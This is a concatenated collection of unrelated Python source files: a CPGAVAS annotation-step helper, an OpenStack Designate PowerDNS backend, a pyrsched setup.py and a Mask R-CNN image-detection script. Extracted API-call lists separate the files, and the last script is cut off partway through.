Open web page http://www.herbalgenomics.org/cpgavas/
Probably one of mirrors:
Mirror 1: Central China : http://172.16.17.32:16019/analyzer/home
Mirror 2: East Coast USA : http://172.16.17.32:16019/analyzer/home (more stable)
For each sequence (fas file) do:
* Upload file: sequence.fas
* Specify project name, species name if needed, and email address for notification.
* Leave other data on default
* Submit job
* When job is finished:
- download Global multi-GenBank file into job directory ({abspath})
- run zcit command: zcit.py finish {step_name}
The paper describing CPGAVAS2 can be found here:
https://academic.oup.com/nar/advance-article/doi/10.1093/nar/gkz345/5486746
"""
def create_cpgavas_data(step_data, sequences_step):
    """Prepare a CPGAVAS annotation step: write per-sequence FASTA inputs and user instructions.

    Returns the (not yet completed) annotations step object.
    """
    step = AnnotationsStep(sequences_step.project, step_data, remove_data=True)

    # Write one FASTA file per input sequence, with N characters stripped.
    for seq_ident in sequences_step.all_sequences():
        sequence = sequences_step.get_sequence(seq_ident).replace('N', '')
        # ToDo: build the ident mapping (napraviti mapiranje)
        write_fasta(step.step_file(seq_ident + '.fas'), [(seq_ident, sequence)])

    # Store the manual-step instructions for the user.
    with open(step.step_file('INSTRUCTIONS.txt'), 'w') as out:
        out.write(_instructions.format(
            abspath=step.absolute_path(), step_name=step_data['step_name']))

    step.set_sequences(sequences_step.all_sequences())
    step.save(completed=False)
    return step
def finish_cpgavas_data(step_obj):
    """Finish a CPGAVAS step from downloaded results. Not implemented yet.

    :param step_obj: annotations step to finalise (currently unused).
    """
    # Fixed: was `prnt(...)`, a NameError at call time.
    print("ToDo: ...")
    # # Check file named: GeSeqJob-<num>-<num>_GLOBAL_multi-GenBank.gbff
    # for f in step_obj.step_files():
    #     if f.startswith('GeSeqJob') and f.endswith('_GLOBAL_multi-GenBank.gbff'):
    #         filename = f
    #         break
    # else:
    #     print("Warning: can't find GeSeq output file!")
    #     return
    # # Leave original file
    # # ToDo: repair and filter data???
    # # ToDo: inverted_region 126081..1 !!! To_ind > from_ind!!!
    # copy_file(step_obj.step_file(filename), step_obj.get_all_annotation_filename())
    # step_obj._check_data()
    # step_obj.save()
|
[
"zci_bio.annotations.steps.AnnotationsStep"
] |
[((908, 976), 'zci_bio.annotations.steps.AnnotationsStep', 'AnnotationsStep', (['sequences_step.project', 'step_data'], {'remove_data': '(True)'}), '(sequences_step.project, step_data, remove_data=True)\n', (923, 976), False, 'from zci_bio.annotations.steps import AnnotationsStep\n')]
|
# Copyright 2012 Hewlett-Packard Development Company, L.P. All Rights Reserved.
# Copyright 2012 Managed I.T.
#
# Author: <NAME> <<EMAIL>>
# Author: <NAME> <<EMAIL>>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import base64
import threading
from oslo.config import cfg
from oslo.db import options
from sqlalchemy.sql import select
from designate.openstack.common import excutils
from designate.openstack.common import log as logging
from designate.i18n import _LC
from designate import exceptions
from designate.backend import base
from designate.backend.impl_powerdns import tables
from designate.sqlalchemy import session
from designate.sqlalchemy.expressions import InsertFromSelect
# Module-level logger and the global oslo configuration handle.
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
# TSIG algorithms this backend accepts.
TSIG_SUPPORTED_ALGORITHMS = ['hmac-md5']
CONF.register_group(cfg.OptGroup(
    name='backend:powerdns', title="Configuration for Powerdns Backend"
))
CONF.register_opts([
    cfg.StrOpt('domain-type', default='NATIVE', help='PowerDNS Domain Type'),
    cfg.ListOpt('also-notify', default=[], help='List of additional IPs to '
                                                'send NOTIFYs to'),
] + options.database_opts, group='backend:powerdns')
# Override the default DB connection registered above, to avoid name conflicts
# between the Designate and PowerDNS databases.
CONF.set_default('connection', 'sqlite:///$state_path/powerdns.sqlite',
                 group='backend:powerdns')
def _map_col(keys, col):
return dict([(keys[i], col[i]) for i in range(len(keys))])
class PowerDNSBackend(base.Backend):
    """Designate backend driver that stores zone data in a PowerDNS SQL database."""

    __plugin_name__ = 'powerdns'

    def __init__(self, *args, **kwargs):
        super(PowerDNSBackend, self).__init__(*args, **kwargs)

        # Thread-local storage: each (green)thread gets its own DB session.
        self.local_store = threading.local()

    def start(self):
        super(PowerDNSBackend, self).start()

    @property
    def session(self):
        """Return the DB session bound to the current (green)thread."""
        # NOTE: This uses a thread local store, allowing each greenthread to
        #       have it's own session stored correctly. Without this, each
        #       greenthread may end up using a single global session, which
        #       leads to bad things happening.
        if not hasattr(self.local_store, 'session'):
            self.local_store.session = session.get_session(self.name)

        return self.local_store.session

    def _create(self, table, values):
        """Insert *values* into *table* and return the stored row as a dict."""
        query = table.insert()

        resultproxy = self.session.execute(query, values)

        # Refetch the row, for generated columns etc
        query = select([table])\
            .where(table.c.id == resultproxy.inserted_primary_key[0])
        resultproxy = self.session.execute(query)

        return _map_col(query.columns.keys(), resultproxy.fetchone())

    def _update(self, table, values, exc_notfound, id_col=None):
        """Update the row identified by *id_col* with *values*.

        Raises *exc_notfound* unless exactly one row was updated; returns the
        refetched row as a dict.
        """
        if id_col is None:
            id_col = table.c.id

        query = table.update()\
            .where(id_col == values[id_col.name])\
            .values(**values)

        resultproxy = self.session.execute(query)

        if resultproxy.rowcount != 1:
            raise exc_notfound()

        # Refetch the row, for generated columns etc
        query = select([table])\
            .where(id_col == values[id_col.name])
        resultproxy = self.session.execute(query)

        return _map_col(query.columns.keys(), resultproxy.fetchone())

    def _get(self, table, id_, exc_notfound, id_col=None):
        """Fetch a single row by id as a dict; raise *exc_notfound* unless
        exactly one row matches."""
        if id_col is None:
            id_col = table.c.id

        query = select([table])\
            .where(id_col == id_)

        resultproxy = self.session.execute(query)

        results = resultproxy.fetchall()

        if len(results) != 1:
            raise exc_notfound()

        # Map col keys to values in result
        return _map_col(query.columns.keys(), results[0])

    def _delete(self, table, id_, exc_notfound, id_col=None):
        """Delete a single row by id; raise *exc_notfound* unless exactly one
        row was removed."""
        if id_col is None:
            id_col = table.c.id

        query = table.delete()\
            .where(id_col == id_)

        resultproxy = self.session.execute(query)

        if resultproxy.rowcount != 1:
            raise exc_notfound()

    # TSIG Key Methods
    def create_tsigkey(self, context, tsigkey):
        """Create a TSIG Key and install it on every domain."""
        if tsigkey['algorithm'] not in TSIG_SUPPORTED_ALGORITHMS:
            raise exceptions.NotImplemented('Unsupported algorithm')

        values = {
            'designate_id': tsigkey['id'],
            'name': tsigkey['name'],
            'algorithm': tsigkey['algorithm'],
            'secret': base64.b64encode(tsigkey['secret'])
        }

        self._create(tables.tsigkeys, values)

        # NOTE(kiall): Prepare and execute query to install this TSIG Key on
        #              every domain. We use a manual query here since anything
        #              else would be impossibly slow.
        query_select = select([
            tables.domains.c.id,
            "'TSIG-ALLOW-AXFR'",
            "'%s'" % tsigkey['name']]
        )

        columns = [
            tables.domain_metadata.c.domain_id,
            tables.domain_metadata.c.kind,
            tables.domain_metadata.c.content,
        ]

        query = InsertFromSelect(tables.domain_metadata, query_select,
                                 columns)

        # NOTE(kiall): A TX is required for, at the least, SQLite.
        self.session.begin()
        self.session.execute(query)
        self.session.commit()

    def update_tsigkey(self, context, tsigkey):
        """Update a TSIG Key, renaming its DomainMetadata entries if needed."""
        values = self._get(
            tables.tsigkeys,
            tsigkey['id'],
            exceptions.TsigKeyNotFound,
            id_col=tables.tsigkeys.c.designate_id)

        # Store a copy of the original name..
        original_name = values['name']

        values.update({
            'name': tsigkey['name'],
            'algorithm': tsigkey['algorithm'],
            'secret': base64.b64encode(tsigkey['secret'])
        })

        self._update(tables.tsigkeys, values,
                     id_col=tables.tsigkeys.c.designate_id,
                     exc_notfound=exceptions.TsigKeyNotFound)

        # If the name changed, Update the necessary DomainMetadata records
        if original_name != tsigkey['name']:
            # Fixed: the kind is stored as 'TSIG-ALLOW-AXFR' (see
            # create/delete_tsigkey); the old underscore spelling never
            # matched any row.
            query = tables.domain_metadata.update()\
                .where(tables.domain_metadata.c.kind == 'TSIG-ALLOW-AXFR')\
                .where(tables.domain_metadata.c.content == original_name)

            # Fixed: update() statements are generative -- the result of
            # .values() must be captured, otherwise the rename was silently
            # dropped and an empty UPDATE was executed.
            query = query.values(content=tsigkey['name'])
            self.session.execute(query)

    def delete_tsigkey(self, context, tsigkey):
        """Delete a TSIG Key and its per-domain metadata entries."""
        try:
            # Delete this TSIG Key itself
            self._delete(
                tables.tsigkeys, tsigkey['id'],
                exceptions.TsigKeyNotFound,
                id_col=tables.tsigkeys.c.designate_id)
        except exceptions.TsigKeyNotFound:
            # If the TSIG Key is already gone, that's ok. We're deleting it
            # anyway, so just log and continue.
            LOG.critical(_LC('Attempted to delete a TSIG key which is '
                             'not present in the backend. ID: %s') %
                         tsigkey['id'])
            return

        # Delete this TSIG Key from every domain's metadata
        query = tables.domain_metadata.delete()\
            .where(tables.domain_metadata.c.kind == 'TSIG-ALLOW-AXFR')\
            .where(tables.domain_metadata.c.content == tsigkey['name'])
        self.session.execute(query)

    # Domain Methods
    def create_domain(self, context, domain):
        """Create a PowerDNS domain row plus its TSIG/ALSO-NOTIFY metadata."""
        try:
            self.session.begin()

            servers = self.central_service.find_servers(self.admin_context)

            domain_values = {
                'designate_id': domain['id'],
                'name': domain['name'].rstrip('.'),
                'master': servers[0]['name'].rstrip('.'),
                'type': CONF['backend:powerdns'].domain_type,
                'account': context.tenant
            }

            domain_ref = self._create(tables.domains, domain_values)

            # Install all TSIG Keys on this domain
            query = select([tables.tsigkeys.c.name])
            resultproxy = self.session.execute(query)
            values = [i for i in resultproxy.fetchall()]

            self._update_domainmetadata(domain_ref['id'], 'TSIG-ALLOW-AXFR',
                                        values)

            # Install all Also Notify's on this domain
            self._update_domainmetadata(domain_ref['id'], 'ALSO-NOTIFY',
                                        CONF['backend:powerdns'].also_notify)
        except Exception:
            with excutils.save_and_reraise_exception():
                self.session.rollback()
        else:
            self.session.commit()

    def update_domain(self, context, domain):
        """Propagate a domain TTL change to records that inherit it."""
        domain_ref = self._get(tables.domains, domain['id'],
                               exceptions.DomainNotFound,
                               id_col=tables.domains.c.designate_id)

        try:
            self.session.begin()

            # Update the Records TTLs where necessary
            query = tables.records.update()\
                .where(tables.records.c.domain_id == domain_ref['id'])
            query = query.where(tables.records.c.inherit_ttl == True)  # noqa
            query = query.values(ttl=domain['ttl'])
            self.session.execute(query)
        except Exception:
            with excutils.save_and_reraise_exception():
                self.session.rollback()
        else:
            self.session.commit()

    def delete_domain(self, context, domain):
        """Delete a domain together with its records and metadata."""
        try:
            domain_ref = self._get(tables.domains, domain['id'],
                                   exceptions.DomainNotFound,
                                   id_col=tables.domains.c.designate_id)
        except exceptions.DomainNotFound:
            # If the Domain is already gone, that's ok. We're deleting it
            # anyway, so just log and continue.
            LOG.critical(_LC('Attempted to delete a domain which is '
                             'not present in the backend. ID: %s') %
                         domain['id'])
            return

        self._delete(tables.domains, domain['id'],
                     exceptions.DomainNotFound,
                     id_col=tables.domains.c.designate_id)

        # Ensure the records are deleted
        query = tables.records.delete()\
            .where(tables.records.c.domain_id == domain_ref['id'])
        self.session.execute(query)

        # Ensure domainmetadata is deleted
        query = tables.domain_metadata.delete()\
            .where(tables.domain_metadata.c.domain_id == domain_ref['id'])
        self.session.execute(query)

    # RecordSet Methods
    def create_recordset(self, context, domain, recordset):
        """Create all records of a recordset inside one transaction."""
        try:
            self.session.begin(subtransactions=True)
            # Create all the records..
            for record in recordset.records:
                self.create_record(context, domain, recordset, record)
        except Exception:
            with excutils.save_and_reraise_exception():
                self.session.rollback()
        else:
            self.session.commit()

    def update_recordset(self, context, domain, recordset):
        """Replace the recordset's records by delete-and-recreate."""
        # TODO(kiall): This is a total kludge. Intended as the simplest
        #              possible fix for the issue. This needs to be
        #              re-implemented correctly.
        try:
            self.session.begin(subtransactions=True)

            self.delete_recordset(context, domain, recordset)
            self.create_recordset(context, domain, recordset)
        except Exception:
            with excutils.save_and_reraise_exception():
                self.session.rollback()
        else:
            self.session.commit()

    def delete_recordset(self, context, domain, recordset):
        """Delete every record belonging to a recordset."""
        # Ensure records are deleted
        query = tables.records.delete()\
            .where(tables.records.c.designate_recordset_id == recordset['id'])
        self.session.execute(query)

    # Record Methods
    def create_record(self, context, domain, recordset, record):
        """Create a single PowerDNS record row for *record*."""
        domain_ref = self._get(tables.domains, domain['id'],
                               exceptions.DomainNotFound,
                               id_col=tables.domains.c.designate_id)

        content = self._sanitize_content(recordset['type'], record['data'])
        # Records without their own TTL inherit the domain's TTL.
        ttl = domain['ttl'] if recordset['ttl'] is None else recordset['ttl']

        record_values = {
            'designate_id': record['id'],
            'designate_recordset_id': record['recordset_id'],
            'domain_id': domain_ref['id'],
            'name': recordset['name'].rstrip('.'),
            'type': recordset['type'],
            'content': content,
            'ttl': ttl,
            'inherit_ttl': True if recordset['ttl'] is None else False,
            'prio': record['priority'],
            'auth': self._is_authoritative(domain, recordset, record)
        }

        self._create(tables.records, record_values)

    def update_record(self, context, domain, recordset, record):
        """Update the PowerDNS row backing *record*."""
        record_ref = self._get_record(record['id'])

        content = self._sanitize_content(recordset['type'], record['data'])
        ttl = domain['ttl'] if recordset['ttl'] is None else recordset['ttl']

        record_ref.update({
            'content': content,
            'ttl': ttl,
            'inherit_ttl': True if recordset['ttl'] is None else False,
            'prio': record['priority'],
            'auth': self._is_authoritative(domain, recordset, record)
        })

        self._update(tables.records, record_ref,
                     exc_notfound=exceptions.RecordNotFound)

    def delete_record(self, context, domain, recordset, record):
        """Delete the PowerDNS row backing *record*, tolerating absence."""
        try:
            record_ref = self._get(tables.records, record['id'],
                                   exceptions.RecordNotFound,
                                   id_col=tables.records.c.designate_id)
        except exceptions.RecordNotFound:
            # If the Record is already gone, that's ok. We're deleting it
            # anyway, so just log and continue.
            LOG.critical(_LC('Attempted to delete a record which is '
                             'not present in the backend. ID: %s') %
                         record['id'])
        else:
            self._delete(tables.records, record_ref['id'],
                         exceptions.RecordNotFound)

    # Internal Methods
    def _update_domainmetadata(self, domain_id, kind, values=None,
                               delete=True):
        """Updates a domain's metadata with new values"""
        # Fetch all current metadata of the specified kind
        values = values or []

        query = select([tables.domain_metadata.c.content])\
            .where(tables.domain_metadata.c.domain_id == domain_id)\
            .where(tables.domain_metadata.c.kind == kind)

        resultproxy = self.session.execute(query)
        results = resultproxy.fetchall()

        for metadata_id, content in results:
            if content not in values:
                if delete:
                    LOG.debug('Deleting stale domain metadata: %r' %
                              ([domain_id, kind, content],))
                    # Delete no longer necessary values
                    # We should never get a notfound here, so UnknownFailure is
                    # a reasonable choice.
                    self._delete(tables.domain_metadata, metadata_id,
                                 exceptions.UnknownFailure)
            else:
                # Remove pre-existing values from the list of values to insert
                values.remove(content)

        # Insert new values
        for value in values:
            LOG.debug('Inserting new domain metadata: %r' %
                      ([domain_id, kind, value],))
            self._create(
                tables.domain_metadata,
                {
                    "domain_id": domain_id,
                    "kind": kind,
                    "content": value
                })

    def _is_authoritative(self, domain, recordset, record):
        """Return False only for delegation NS records (name != zone apex)."""
        # NOTE(kiall): See http://doc.powerdns.com/dnssec-modes.html
        if recordset['type'] == 'NS' and recordset['name'] != domain['name']:
            return False
        else:
            return True

    def _sanitize_content(self, type, content):
        """Normalise record content to the form PowerDNS expects."""
        if type in ('CNAME', 'MX', 'SRV', 'NS', 'PTR'):
            return content.rstrip('.')

        if type in ('TXT', 'SPF'):
            return '"%s"' % content.replace('"', '\\"')

        return content

    def _get_record(self, record_id=None, domain=None, type_=None):
        """Fetch exactly one record row matching the given filters as a dict."""
        query = select([tables.records])

        if record_id:
            query = query.where(tables.records.c.designate_id == record_id)

        if type_:
            query = query.where(tables.records.c.type == type_)

        if domain:
            query = query.where(tables.records.c.domain_id == domain['id'])

        resultproxy = self.session.execute(query)
        results = resultproxy.fetchall()

        if len(results) < 1:
            raise exceptions.RecordNotFound('No record found')
        elif len(results) > 1:
            raise exceptions.RecordNotFound('Too many records found')
        else:
            return _map_col(query.columns.keys(), results[0])
|
[
"designate.backend.impl_powerdns.tables.domain_metadata.delete",
"designate.sqlalchemy.expressions.InsertFromSelect",
"designate.openstack.common.excutils.save_and_reraise_exception",
"designate.exceptions.RecordNotFound",
"designate.exceptions.NotImplemented",
"oslo.config.cfg.OptGroup",
"designate.backend.impl_powerdns.tables.records.update",
"designate.i18n._LC",
"threading.local",
"oslo.config.cfg.ListOpt",
"designate.backend.impl_powerdns.tables.records.delete",
"base64.b64encode",
"designate.sqlalchemy.session.get_session",
"designate.backend.impl_powerdns.tables.domain_metadata.update",
"designate.openstack.common.log.getLogger",
"sqlalchemy.sql.select",
"oslo.config.cfg.StrOpt"
] |
[((1199, 1226), 'designate.openstack.common.log.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (1216, 1226), True, 'from designate.openstack.common import log as logging\n'), ((1305, 1391), 'oslo.config.cfg.OptGroup', 'cfg.OptGroup', ([], {'name': '"""backend:powerdns"""', 'title': '"""Configuration for Powerdns Backend"""'}), "(name='backend:powerdns', title=\n 'Configuration for Powerdns Backend')\n", (1317, 1391), False, 'from oslo.config import cfg\n'), ((2229, 2246), 'threading.local', 'threading.local', ([], {}), '()\n', (2244, 2246), False, 'import threading\n'), ((5340, 5416), 'sqlalchemy.sql.select', 'select', (['[tables.domains.c.id, "\'TSIG-ALLOW-AXFR\'", "\'%s\'" % tsigkey[\'name\']]'], {}), '([tables.domains.c.id, "\'TSIG-ALLOW-AXFR\'", "\'%s\'" % tsigkey[\'name\']])\n', (5346, 5416), False, 'from sqlalchemy.sql import select\n'), ((5648, 5711), 'designate.sqlalchemy.expressions.InsertFromSelect', 'InsertFromSelect', (['tables.domain_metadata', 'query_select', 'columns'], {}), '(tables.domain_metadata, query_select, columns)\n', (5664, 5711), False, 'from designate.sqlalchemy.expressions import InsertFromSelect\n'), ((17162, 17186), 'sqlalchemy.sql.select', 'select', (['[tables.records]'], {}), '([tables.records])\n', (17168, 17186), False, 'from sqlalchemy.sql import select\n'), ((1420, 1492), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', (['"""domain-type"""'], {'default': '"""NATIVE"""', 'help': '"""PowerDNS Domain Type"""'}), "('domain-type', default='NATIVE', help='PowerDNS Domain Type')\n", (1430, 1492), False, 'from oslo.config import cfg\n'), ((1498, 1591), 'oslo.config.cfg.ListOpt', 'cfg.ListOpt', (['"""also-notify"""'], {'default': '[]', 'help': '"""List of additional IPs to send NOTIFYs to"""'}), "('also-notify', default=[], help=\n 'List of additional IPs to send NOTIFYs to')\n", (1509, 1591), False, 'from oslo.config import cfg\n'), ((2747, 2777), 'designate.sqlalchemy.session.get_session', 'session.get_session', 
(['self.name'], {}), '(self.name)\n', (2766, 2777), False, 'from designate.sqlalchemy import session\n'), ((4793, 4843), 'designate.exceptions.NotImplemented', 'exceptions.NotImplemented', (['"""Unsupported algorithm"""'], {}), "('Unsupported algorithm')\n", (4818, 4843), False, 'from designate import exceptions\n'), ((5013, 5048), 'base64.b64encode', 'base64.b64encode', (["tsigkey['secret']"], {}), "(tsigkey['secret'])\n", (5029, 5048), False, 'import base64\n'), ((8555, 8587), 'sqlalchemy.sql.select', 'select', (['[tables.tsigkeys.c.name]'], {}), '([tables.tsigkeys.c.name])\n', (8561, 8587), False, 'from sqlalchemy.sql import select\n'), ((17605, 17649), 'designate.exceptions.RecordNotFound', 'exceptions.RecordNotFound', (['"""No record found"""'], {}), "('No record found')\n", (17630, 17649), False, 'from designate import exceptions\n'), ((3018, 3033), 'sqlalchemy.sql.select', 'select', (['[table]'], {}), '([table])\n', (3024, 3033), False, 'from sqlalchemy.sql import select\n'), ((3658, 3673), 'sqlalchemy.sql.select', 'select', (['[table]'], {}), '([table])\n', (3664, 3673), False, 'from sqlalchemy.sql import select\n'), ((3982, 3997), 'sqlalchemy.sql.select', 'select', (['[table]'], {}), '([table])\n', (3988, 3997), False, 'from sqlalchemy.sql import select\n'), ((6381, 6416), 'base64.b64encode', 'base64.b64encode', (["tsigkey['secret']"], {}), "(tsigkey['secret'])\n", (6397, 6416), False, 'import base64\n'), ((10834, 10857), 'designate.backend.impl_powerdns.tables.records.delete', 'tables.records.delete', ([], {}), '()\n', (10855, 10857), False, 'from designate.backend.impl_powerdns import tables\n'), ((11022, 11053), 'designate.backend.impl_powerdns.tables.domain_metadata.delete', 'tables.domain_metadata.delete', ([], {}), '()\n', (11051, 11053), False, 'from designate.backend.impl_powerdns import tables\n'), ((12368, 12391), 'designate.backend.impl_powerdns.tables.records.delete', 'tables.records.delete', ([], {}), '()\n', (12389, 12391), False, 'from 
designate.backend.impl_powerdns import tables\n'), ((17699, 17750), 'designate.exceptions.RecordNotFound', 'exceptions.RecordNotFound', (['"""Too many records found"""'], {}), "('Too many records found')\n", (17724, 17750), False, 'from designate import exceptions\n'), ((9075, 9112), 'designate.openstack.common.excutils.save_and_reraise_exception', 'excutils.save_and_reraise_exception', ([], {}), '()\n', (9110, 9112), False, 'from designate.openstack.common import excutils\n'), ((9559, 9582), 'designate.backend.impl_powerdns.tables.records.update', 'tables.records.update', ([], {}), '()\n', (9580, 9582), False, 'from designate.backend.impl_powerdns import tables\n'), ((9869, 9906), 'designate.openstack.common.excutils.save_and_reraise_exception', 'excutils.save_and_reraise_exception', ([], {}), '()\n', (9904, 9906), False, 'from designate.openstack.common import excutils\n'), ((11516, 11553), 'designate.openstack.common.excutils.save_and_reraise_exception', 'excutils.save_and_reraise_exception', ([], {}), '()\n', (11551, 11553), False, 'from designate.openstack.common import excutils\n'), ((12127, 12164), 'designate.openstack.common.excutils.save_and_reraise_exception', 'excutils.save_and_reraise_exception', ([], {}), '()\n', (12162, 12164), False, 'from designate.openstack.common import excutils\n'), ((7513, 7599), 'designate.i18n._LC', '_LC', (['"""Attempted to delete a TSIG key which is not present in the backend. ID: %s"""'], {}), "('Attempted to delete a TSIG key which is not present in the backend. ID: %s'\n )\n", (7516, 7599), False, 'from designate.i18n import _LC\n'), ((7705, 7736), 'designate.backend.impl_powerdns.tables.domain_metadata.delete', 'tables.domain_metadata.delete', ([], {}), '()\n', (7734, 7736), False, 'from designate.backend.impl_powerdns import tables\n'), ((10445, 10524), 'designate.i18n._LC', '_LC', (['"""Attempted to delete a domain which is not present in the backend. 
ID: %s"""'], {}), "('Attempted to delete a domain which is not present in the backend. ID: %s')\n", (10448, 10524), False, 'from designate.i18n import _LC\n'), ((14633, 14712), 'designate.i18n._LC', '_LC', (['"""Attempted to delete a record which is not present in the backend. ID: %s"""'], {}), "('Attempted to delete a record which is not present in the backend. ID: %s')\n", (14636, 14712), False, 'from designate.i18n import _LC\n'), ((15211, 15253), 'sqlalchemy.sql.select', 'select', (['[tables.domain_metadata.c.content]'], {}), '([tables.domain_metadata.c.content])\n', (15217, 15253), False, 'from sqlalchemy.sql import select\n'), ((6738, 6769), 'designate.backend.impl_powerdns.tables.domain_metadata.update', 'tables.domain_metadata.update', ([], {}), '()\n', (6767, 6769), False, 'from designate.backend.impl_powerdns import tables\n')]
|
from setuptools import (setup, find_namespace_packages)
from os import path
from pkg_resources import parse_version
from pyrsched.rpc import (NAME, VERSION)
# Absolute path of the directory containing this setup.py.
here = path.abspath(path.dirname(__file__))
# Use the README as the PyPI long description.
with open(path.join(here, 'README.md'), encoding='utf-8') as f:
    LONG_DESCRIPTION = f.read()
setup(
    name=NAME,
    version=VERSION,
    description="RPC client for pypyr-scheduler-server",
    long_description=LONG_DESCRIPTION,
    long_description_content_type='text/markdown',
    url=f"https://github.com/pypyr-scheduler/{NAME}",
    license='MIT',
    author='<NAME>',
    author_email="<EMAIL>",
    classifiers=[
        'Intended Audience :: Developers',
        "License :: OSI Approved :: MIT License",
        "Programming Language :: Python",
        "Programming Language :: Python :: 3.7",
    ],
    keywords=["Pypyr", "Scheduler", "Taskrunner"],
    # Only ship subpackages of the 'pyrsched' namespace package.
    packages=find_namespace_packages(include=['pyrsched.*', ]),
    namespace_packages=['pyrsched'],
    include_package_data=True,
    setup_requires=['pytest-runner'],
    tests_require=['pytest'],
)
|
[
"setuptools.find_namespace_packages",
"os.path.dirname",
"os.path.join"
] |
[((179, 201), 'os.path.dirname', 'path.dirname', (['__file__'], {}), '(__file__)\n', (191, 201), False, 'from os import path\n'), ((214, 242), 'os.path.join', 'path.join', (['here', '"""README.md"""'], {}), "(here, 'README.md')\n", (223, 242), False, 'from os import path\n'), ((926, 973), 'setuptools.find_namespace_packages', 'find_namespace_packages', ([], {'include': "['pyrsched.*']"}), "(include=['pyrsched.*'])\n", (949, 973), False, 'from setuptools import setup, find_namespace_packages\n')]
|
import sys
sys.path.append('../src/')
import os
import numpy as np
from mask_rcnn.mrcnn import utils
import mask_rcnn.mrcnn.model as modellib
from mask_rcnn.samples.coco import coco
import cv2
import argparse as ap
class InferenceConfig(coco.CocoConfig):
    """COCO configuration specialised for single-image inference."""
    # Set batch size to 1 since we'll be running inference on
    # one image at a time. Batch size = GPU_COUNT * IMAGES_PER_GPU
    GPU_COUNT = 1
    IMAGES_PER_GPU = 1
def get_mask_rcnn(model, image, COCO_MODEL_PATH):
    """Run Mask R-CNN detection on one image and return filtered detections.

    :param model: Mask R-CNN model exposing detect([image], verbose=...).
    :param image: image array to run detection on.
    :param COCO_MODEL_PATH: unused; kept for interface compatibility.
    :returns: (boxes, scores, classes) arrays, aligned element-wise,
              containing only non-background detections with score > 0.7.
    """
    # Run detection
    results = model.detect([image], verbose=1)
    r = results[0]
    idx = np.where(r['class_ids'] != 0)  # select non-background
    boxes = r['rois'][idx]
    scores = r['scores'][idx]
    classes = r['class_ids'][idx]
    # Score threshold = 0.7. Fixed: the filtered scores were previously
    # assigned to an unused variable (people_scores) while the unfiltered
    # array was returned, leaving the returned scores misaligned with the
    # filtered boxes/classes.
    idxs = np.where(scores > 0.7)
    boxes = boxes[idxs]
    scores = scores[idxs]
    classes = classes[idxs]
    return boxes, scores, classes
def run(read_direc, save_direc, model, COCO_MODEL_PATH, class_names, save_image=False):
    """Detect objects in every image under read_direc and log results under save_direc.

    Detections are appended to save_direc/groundtruth_boxes_mask.txt; processed
    file names are tracked in ./processed_images_mask.txt so an interrupted run
    can be resumed. When save_image is True, annotated copies are written to
    save_direc/images_mask/.
    """
    # Resume support: load the list of already-processed image names.
    if os.path.exists('./processed_images_mask.txt'):
        with open('./processed_images_mask.txt', 'r') as f:
            processed_files = f.readlines()
    else:
        processed_files = []
    print('Started:', save_direc, read_direc)
    if not os.path.exists(save_direc+'/'):
        os.mkdir(save_direc+'/')
    if save_image:
        if not os.path.exists(save_direc+'/images_mask/'):
            os.mkdir(save_direc + '/images_mask/')
    i=0
    for fi in os.listdir(read_direc):
        # readlines() keeps the trailing newline, hence the fi + '\n' test.
        if fi + '\n' in processed_files:
            print('Skipping ', fi)
            continue
        image = cv2.imread(read_direc +fi)
        #histogram equalization (on the V channel only, to boost contrast)
        image = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
        image[:,:,2] = cv2.equalizeHist(image[:,:,2])
        image = cv2.cvtColor(image, cv2.COLOR_HSV2BGR)
        i = i+1
        if i % 1000 == 0:
            print('Processed ' + str(i) + 'images')
        # Scale factors to map boxes from the resized 540x960 image back to
        # the original resolution.
        scaler_y = np.shape(image)[0]/960
        scaler_x = np.shape(image)[1]/540
        image1 = cv2.resize(image, (540, 960))
        mask_boxes, mask_scores, mask_classes = get_mask_rcnn(model, image1, COCO_MODEL_PATH)
        for bbox, score, classid in zip(mask_boxes, mask_scores, mask_classes):
            # Rescale the box (y1, x1, y2, x2) in place to original coordinates.
            bbox[1] = int(bbox[1])*scaler_x
            bbox[0] = int(bbox[0])*scaler_y
            bbox[3] = int(bbox[3])*scaler_x
            bbox[2] = int(bbox[2])*scaler_y
            with open(save_direc+'/groundtruth_boxes_mask.txt', 'a') as f:
                f.write(str(fi) + ' ' + str(bbox[1])+ ' ' + str(bbox[0]) + ' ' + str(bbox[3]) + ' ' + str(bbox[2]) + ' ' + str(score) + ' ' + class_names[classid] + '\n')
            if save_image:
                cv2.rectangle(image, (int(bbox[1]+1), int(bbox[0]+1)), (int(bbox[3]+1), int(bbox[2]+1)), (0,255,0), 3)
                cv2.putText(image, class_names[classid], (round(float(bbox[1])), round(float(bbox[0]))), cv2.FONT_HERSHEY_SIMPLEX, 4,(0,0,255),10,cv2.LINE_AA)
        # Mark this image as done so a re-run skips it.
        with open('./processed_images_mask.txt', 'a') as f:
            f.write(fi + '\n')
        if save_image:
            cv2.imwrite(save_direc+'/images_mask/' + str(i) + '.jpg', image)
if __name__ == '__main__':
    # Parse CLI options: input dir, output dir, optional annotated-image dump.
    parser = ap.ArgumentParser()
    parser.add_argument('-r', "--readdir", help="Directory with images")
    parser.add_argument('-s', "--savedir", help="Directory for saving the detection results")
    parser.add_argument('-i', "--saveimage", action='store_true', help="Save image with predicted bounding box or not")
    args = vars(parser.parse_args())
    read_direc = args['readdir']
    save_direc = args['savedir']
    COCO_MODEL_PATH = "../src/models/mask_rcnn_coco.h5"
    MODEL_DIR = os.path.join('mask_rcnn/', "logs")
    # COCO class labels indexed by class id (index 0 is background).
    class_names = ['BG', 'person', 'bicycle', 'car', 'motorcycle', 'airplane',
                   'bus', 'train', 'truck', 'boat', 'trafficlight',
                   'fire hydrant', 'stop sign', 'parkingmeter', 'bench', 'bird',
                   'cat', 'dog', 'horse', 'sheep', 'cow', 'elephant', 'bear',
                   'zebra', 'giraffe', 'backpack', 'umbrella', 'handbag', 'tie',
                   'suitcase', 'frisbee', 'skis', 'snowboard', 'sportsball',
                   'kite', 'baseballbat', 'baseballglove', 'skateboard',
